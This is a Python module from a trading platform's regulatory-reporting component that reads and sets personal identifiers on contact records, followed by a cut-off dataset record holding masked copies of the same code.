"""Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact"""
try:
acm.BeginTransaction()
self.__contact.Commit()
if FIntegrationUtils.FIntegrationUtils.get_acm_version_override(
) < 2015.4:
self.__integration_utils.set_additional_info('DateOfBirth',
self.__contact, self.__reg_date_of_birth)
self.__integration_utils.set_additional_info('FirstName',
self.__contact, self.__reg_first_name)
self.__integration_utils.set_additional_info('LastName',
self.__contact, self.__reg_last_name)
self.__integration_utils.set_additional_info('NationalId',
self.__contact, self.__reg_national_id)
self.__integration_utils.set_additional_info('RegContactCrmId',
self.__contact, self.__reg_crm_id)
self.__integration_utils.set_additional_info(
'RegContExchangeId', self.__contact, self.__reg_exchange_id
)
self.__integration_utils.set_additional_info('UniqueName',
self.__contact, self.__reg_unique_name)
self.__integration_utils.set_additional_info(
'RegGeneralPartner', self.__contact, self.
__is_general_partner)
acm.CommitTransaction()
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
FRegulatoryLogger.ERROR(logger, 'ABORTING TRANSACTION***********')
acm.AbortTransaction()
def Delete(self):
"""Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
FRegulatoryUtils.Delete(self.__contact, 'Contact')
FRegulatoryLogger.DEBUG(logger,
'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'
)
def Attributes(self):
"""returns the attributes on the FContactRegulatoryInfoBase instance"""
return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)
def RegulatoryInfo(self):
"""returns the FContactRegulatoryInfoBase instance for the given contact"""
conactRegInfo = FContactRegulatoryInfo(self)
return conactRegInfo
def Select(query):
"""Return a collection of FContactRegulatoryInfoBase instances matching constraint specified in the Select query"""
party = None
if query.find('and party') != -1:
pos = query.find('and party')
party_name = query[pos + len('and party'):]
query = query[0:pos]
party_name = party_name.replace('=', '').replace("'", '')
party_name = party_name.strip()
party = acm.FParty[party_name]
return_result = FRegulatoryUtils.Select(query, 'FContact', party)
return return_result
<|reserved_special_token_1|>
"""------------------------------------------------------------------------
MODULE
FContactRegulatoryInfoBase -
DESCRIPTION:
This file provides the custom instance of RegulatoryInfo on the Contact which has all the RegulatoryInfo related methods
VERSION: 1.0.25(0.25.7)
RESTRICTIONS/ LIMITATIONS:
1. Any modifications to the scripts/ encrypted modules/ clear text code within the core is not supported.
2. This module is not customizable
3. The component may not work as expected with any modifications done to this module at user end
--------------------------------------------------------------------------"""
import string
import acm
import FIntegrationUtils
import FRegulatoryLogger
import ael
import FRegulatoryUtils
import FRegulatoryInfoException
logger = 'FContactRegulatoryInfoBase'
VALUE_NOT_SET = ()
class FContactRegulatoryInfoBase(object):
def __init__(self, contact = None):
"""class that maintains all data related to the regulatory on the FContact"""
try:
self.__contact = contact
if not self.__contact:
FRegulatoryLogger.ERROR(logger, "The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object")
return None
self.__reg_date_of_birth = None
self.__reg_first_name = None
self.__reg_last_name = None
self.__reg_national_id = None
self.__reg_crm_id = None
self.__crm_id_source = None
self.__reg_exchange_id = None
self.__reg_unique_name = None
self.__client_type = None
self.__is_general_partner = None
if contact:
self.__refresh(contact)
self.__integration_utils = FIntegrationUtils.FIntegrationUtils()
except Exception as e :
FRegulatoryLogger.ERROR(logger, str(e))
def __refresh(self, contact):
self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value('dateOfBirth', self.__contact)
self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName', self.__contact)
self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName', self.__contact)
self.__reg_national_id = FRegulatoryUtils.get_addinfo_value('nationalId', self.__contact)
self.__is_general_partner = FRegulatoryUtils.get_addinfo_value('regGeneralPartner', self.__contact)
self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value('regContactCrmId', self.__contact)
self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value('regContExchangeId', self.__contact)
try:
self.__reg_unique_name = self.__contact.UniqueName()
except:
self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value('uniqueName', self.__contact)
def Contact(self):
"""returns the contact for which this wrapper has all the addinfo/column values"""
return self.__contact
def DateOfBirth(self, reg_date_of_birth = VALUE_NOT_SET):
"""Date of birth of the concerned natural person"""
ael_reg_dob = None
if reg_date_of_birth != VALUE_NOT_SET:
try:
ael_reg_dob = ael.date_from_string(reg_date_of_birth)
except:
if reg_date_of_birth not in ['', None]:
msg = "The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo"%reg_date_of_birth
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
if ael_reg_dob:
self.__reg_date_of_birth = reg_date_of_birth
else:
self.__reg_date_of_birth = None
try:
self.__contact.AdditionalInfo().DateOfBirth(self.__reg_date_of_birth)
except:
pass
else:
return self.__reg_date_of_birth
def FirstName(self, reg_first_name = VALUE_NOT_SET):
"""First name of the concerned natural person"""
if reg_first_name != VALUE_NOT_SET:
self.__reg_first_name = reg_first_name
try:
self.__contact.AdditionalInfo().FirstName(self.__reg_first_name)
except:
pass
else:
if not self.__reg_first_name:
self.__reg_first_name = None
return self.__reg_first_name
def LastName(self, reg_last_name = VALUE_NOT_SET):
"""Last name of the concerned natural person"""
if reg_last_name != VALUE_NOT_SET:
self.__reg_last_name = reg_last_name
try:
self.__contact.AdditionalInfo().LastName(self.__reg_last_name)
except:
pass
else:
if not self.__reg_last_name:
self.__reg_last_name = None
return self.__reg_last_name
def NationalId(self, reg_national_id = VALUE_NOT_SET):
"""NationalId of the concerned natural person"""
if reg_national_id != VALUE_NOT_SET:
self.__reg_national_id = reg_national_id
try:
self.__contact.AdditionalInfo().NationalId(self.__reg_national_id)
except:
pass
else:
if not self.__reg_national_id:
self.__reg_national_id = None
return self.__reg_national_id
def CrmId(self, crm_id = VALUE_NOT_SET):
"""CrmId of the concerned natural person"""
if crm_id != VALUE_NOT_SET:
self.__reg_crm_id = crm_id
try:
self.__contact.AdditionalInfo().RegContactCrmId(self.__reg_crm_id)
except:
pass
else:
if not self.__reg_crm_id:
self.__reg_crm_id = None
return self.__reg_crm_id
def ExchangeId(self, exchange_id = VALUE_NOT_SET):
"""The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged."""
if exchange_id != VALUE_NOT_SET:
if str(exchange_id).isdigit():
self.__reg_exchange_id = int(exchange_id)
elif str(exchange_id) in ['None', '']:
self.__reg_exchange_id = None
else:
msg = "The ExchangeId provided <%s> is not of the expected integer format"%str(exchange_id)
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
try:
self.__contact.AdditionalInfo().RegContExchangeId(self.__reg_exchange_id)
except:
pass
else:
if not self.__reg_exchange_id:
self.__reg_exchange_id = None
return self.__reg_exchange_id
def UniqueName(self, unique_name = VALUE_NOT_SET):
"""An optional unique name, if specified there can only be one contact with this name for each party."""
if unique_name != VALUE_NOT_SET:
try:
if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() >= 2017.2:
self.__contact.UniqueName(unique_name)
else:
is_unique, contact_name = FRegulatoryUtils.is_unique_name(self.__contact, unique_name)
if is_unique:
try:
self.__contact.AdditionalInfo().UniqueName(unique_name)
except:
pass
else:
msg = "The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name."%(unique_name, self.__contact.Fullname(), self.__contact.Party().Name(), contact_name)
FRegulatoryLogger.ERROR(logger, msg)
raise FRegulatoryInfoException.FRegInfoInvalidData(msg)
self.__reg_unique_name = unique_name
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))
else:
if not self.__reg_unique_name:
self.__reg_unique_name = None
return self.__reg_unique_name
def ClientType(self):
"""returns the ClientType based on where the CrmId is found on the linked objects"""
self.__client_type = FRegulatoryUtils.getClientType(self.__contact)
return self.__client_type
def JointAccount(self):
"""Another trader that jointly owns the account with this trader"""
joint_accounts = []
if self.IsGeneralPartner():
for contact in self.__contact.Party().Contacts():
if contact.AdditionalInfo().RegGeneralPartner():
joint_accounts.append(contact)
else:
FRegulatoryLogger.WARN(logger, "<%s> is not a General Partner. Hence JointAccount is None"%self.__contact.Fullname())
joint_accounts = None
return joint_accounts
def IsGeneralPartner(self, is_general_partner = VALUE_NOT_SET):
"""General partner has responsibility for the actions of the business, can legally bind
the business and is personally liable for all the business's debts and obligations."""
if is_general_partner != VALUE_NOT_SET:
self.__is_general_partner = FRegulatoryUtils.get_bool(is_general_partner, 'IsGeneralPartner')
FRegulatoryLogger.DEBUG(logger, "The IsGeneralPartner is being set to <%s>."%(str(self.__is_general_partner)))
try:
self.__contact.AdditionalInfo().RegGeneralPartner(self.__is_general_partner)
except:
pass
else:
if str(self.__is_general_partner) == "None":
FRegulatoryLogger.DEBUG(logger, "The IsGeneralPartner is None. Hence defaulting it to False")
self.__is_general_partner = False
return self.__is_general_partner
def __setattr__(self, attr, val):
if attr.startswith('_'):
super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)
else:
if hasattr(self, attr):
getattr(self, attr)(val)
def Commit(self):
"""Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact"""
try:
acm.BeginTransaction()
self.__contact.Commit()
if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() < 2015.4:
self.__integration_utils.set_additional_info('DateOfBirth', self.__contact, self.__reg_date_of_birth)
self.__integration_utils.set_additional_info('FirstName', self.__contact, self.__reg_first_name)
self.__integration_utils.set_additional_info('LastName', self.__contact, self.__reg_last_name)
self.__integration_utils.set_additional_info('NationalId', self.__contact, self.__reg_national_id)
self.__integration_utils.set_additional_info('RegContactCrmId', self.__contact, self.__reg_crm_id)
self.__integration_utils.set_additional_info('RegContExchangeId', self.__contact, self.__reg_exchange_id)
self.__integration_utils.set_additional_info('UniqueName', self.__contact, self.__reg_unique_name)
self.__integration_utils.set_additional_info('RegGeneralPartner', self.__contact, self.__is_general_partner)
acm.CommitTransaction()
except Exception as e:
FRegulatoryLogger.ERROR(logger, str(e))
FRegulatoryLogger.ERROR(logger, "ABORTING TRANSACTION***********")
acm.AbortTransaction()
def Delete(self):
"""Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS"""
FRegulatoryUtils.Delete(self.__contact, "Contact")
FRegulatoryLogger.DEBUG(logger, "Deleted all AdditionalInfos on Contact related to Regulatory Reporting")
def Attributes(self):
"""returns the attributes on the FContactRegulatoryInfoBase instance"""
return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)
def RegulatoryInfo(self):
"""returns the FContactRegulatoryInfoBase instance for the given contact"""
conactRegInfo = FContactRegulatoryInfo(self)
return conactRegInfo
def Select(query):
"""Return a collection of FContactRegulatoryInfoBase instances matching constraint specified in the Select query"""
party = None
if query.find('and party') != -1:#it means there is an additional condition added
pos = query.find('and party')
party_name = query[(pos + len('and party')):]
query = query[0:pos]
party_name = party_name.replace('=', '').replace("'", '')
party_name = party_name.strip()
party = acm.FParty[party_name]
return_result = FRegulatoryUtils.Select(query, "FContact", party)
return return_result
|
flexible
|
{
"blob_id": "d4e62950f10efeb27d19c3d9c672969342ef8c7c",
"index": 3095,
"step-1": "<mask token>\n\n\nclass FContactRegulatoryInfoBase(object):\n\n def __init__(self, contact=None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger,\n 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'\n )\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n <mask token>\n <mask token>\n\n def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):\n \"\"\"Date of birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob = ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = (\n 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'\n % reg_date_of_birth)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.\n __reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name=VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name\n )\n except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name=VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id=VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.\n __reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id=VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.\n __reg_crm_id)\n except:\n pass\n else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n <mask token>\n\n def UniqueName(self, unique_name=VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if (FIntegrationUtils.FIntegrationUtils.\n get_acm_version_override() >= 2017.2):\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(\n self.__contact, unique_name)\n if is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(\n unique_name)\n except:\n pass\n else:\n msg = (\n 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'\n % (unique_name, self.__contact.Fullname(),\n self.__contact.Party().Name(), contact_name))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n <mask token>\n\n def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(\n is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \n 'The IsGeneralPartner is being set to <%s>.' % str(self.\n __is_general_partner))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.\n __is_general_partner)\n except:\n pass\n else:\n if str(self.__is_general_partner) == 'None':\n FRegulatoryLogger.DEBUG(logger,\n 'The IsGeneralPartner is None. Hence defaulting it to False'\n )\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n elif hasattr(self, attr):\n getattr(self, attr)(val)\n <mask token>\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, 'Contact')\n FRegulatoryLogger.DEBUG(logger,\n 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'\n )\n\n def Attributes(self):\n \"\"\"returns the attributes on the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FContactRegulatoryInfoBase(object):\n\n def __init__(self, contact=None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger,\n 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'\n )\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n\n def __refresh(self, contact):\n self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(\n 'dateOfBirth', self.__contact)\n self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',\n self.__contact)\n self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',\n self.__contact)\n self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(\n 'nationalId', self.__contact)\n self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(\n 'regGeneralPartner', self.__contact)\n self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(\n 'regContactCrmId', self.__contact)\n self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(\n 'regContExchangeId', self.__contact)\n try:\n self.__reg_unique_name = self.__contact.UniqueName()\n except:\n self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(\n 'uniqueName', self.__contact)\n <mask token>\n\n def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):\n \"\"\"Date of birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob = ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = (\n 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'\n % reg_date_of_birth)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.\n __reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name=VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name\n )\n except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name=VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id=VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.\n __reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id=VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.\n __reg_crm_id)\n except:\n pass\n else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n\n def ExchangeId(self, exchange_id=VALUE_NOT_SET):\n \"\"\"The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged.\"\"\"\n if exchange_id != VALUE_NOT_SET:\n if str(exchange_id).isdigit():\n self.__reg_exchange_id = int(exchange_id)\n elif str(exchange_id) in ['None', '']:\n self.__reg_exchange_id = None\n else:\n msg = (\n 'The ExchangeId provided <%s> is not of the expected integer format'\n % str(exchange_id))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n try:\n self.__contact.AdditionalInfo().RegContExchangeId(self.\n __reg_exchange_id)\n except:\n pass\n else:\n if not self.__reg_exchange_id:\n self.__reg_exchange_id = None\n return self.__reg_exchange_id\n\n def UniqueName(self, unique_name=VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if (FIntegrationUtils.FIntegrationUtils.\n get_acm_version_override() >= 2017.2):\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(\n self.__contact, unique_name)\n if is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(\n unique_name)\n except:\n pass\n else:\n msg = (\n 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. Another contact <%s> already has this unique name.'\n % (unique_name, self.__contact.Fullname(),\n self.__contact.Party().Name(), contact_name))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n <mask token>\n\n def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(\n is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \n 'The IsGeneralPartner is being set to <%s>.' % str(self.\n __is_general_partner))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.\n __is_general_partner)\n except:\n pass\n else:\n if str(self.__is_general_partner) == 'None':\n FRegulatoryLogger.DEBUG(logger,\n 'The IsGeneralPartner is None. Hence defaulting it to False'\n )\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n elif hasattr(self, attr):\n getattr(self, attr)(val)\n <mask token>\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, 'Contact')\n FRegulatoryLogger.DEBUG(logger,\n 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'\n )\n\n def Attributes(self):\n \"\"\"returns the attributes on the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FContactRegulatoryInfoBase(object):\n\n def __init__(self, contact=None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger,\n 'The name on the contact is the unique identifier of the contact. Kindly provide a valid acm.FContact object'\n )\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n\n def __refresh(self, contact):\n self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value(\n 'dateOfBirth', self.__contact)\n self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName',\n self.__contact)\n self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName',\n self.__contact)\n self.__reg_national_id = FRegulatoryUtils.get_addinfo_value(\n 'nationalId', self.__contact)\n self.__is_general_partner = FRegulatoryUtils.get_addinfo_value(\n 'regGeneralPartner', self.__contact)\n self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value(\n 'regContactCrmId', self.__contact)\n self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value(\n 'regContExchangeId', self.__contact)\n try:\n self.__reg_unique_name = self.__contact.UniqueName()\n except:\n self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value(\n 'uniqueName', self.__contact)\n\n def Contact(self):\n \"\"\"returns the contact for which this wrapper has all the addinfo/column values\"\"\"\n return self.__contact\n\n def DateOfBirth(self, reg_date_of_birth=VALUE_NOT_SET):\n \"\"\"Date of birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob = ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = (\n 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'\n % reg_date_of_birth)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.\n __reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name=VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name\n )\n except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name=VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id=VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.\n __reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id=VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.\n __reg_crm_id)\n except:\n pass\n else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n\n def ExchangeId(self, exchange_id=VALUE_NOT_SET):\n \"\"\"The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged.\"\"\"\n if exchange_id != VALUE_NOT_SET:\n if str(exchange_id).isdigit():\n self.__reg_exchange_id = int(exchange_id)\n elif str(exchange_id) in ['None', '']:\n self.__reg_exchange_id = None\n else:\n msg = (\n 'The ExchangeId provided <%s> is not of the expected integer format'\n % str(exchange_id))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n try:\n self.__contact.AdditionalInfo().RegContExchangeId(self.\n __reg_exchange_id)\n except:\n pass\n else:\n if not self.__reg_exchange_id:\n self.__reg_exchange_id = None\n return self.__reg_exchange_id\n\n def UniqueName(self, unique_name=VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if (FIntegrationUtils.FIntegrationUtils.\n get_acm_version_override() >= 2017.2):\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(\n self.__contact, unique_name)\n if 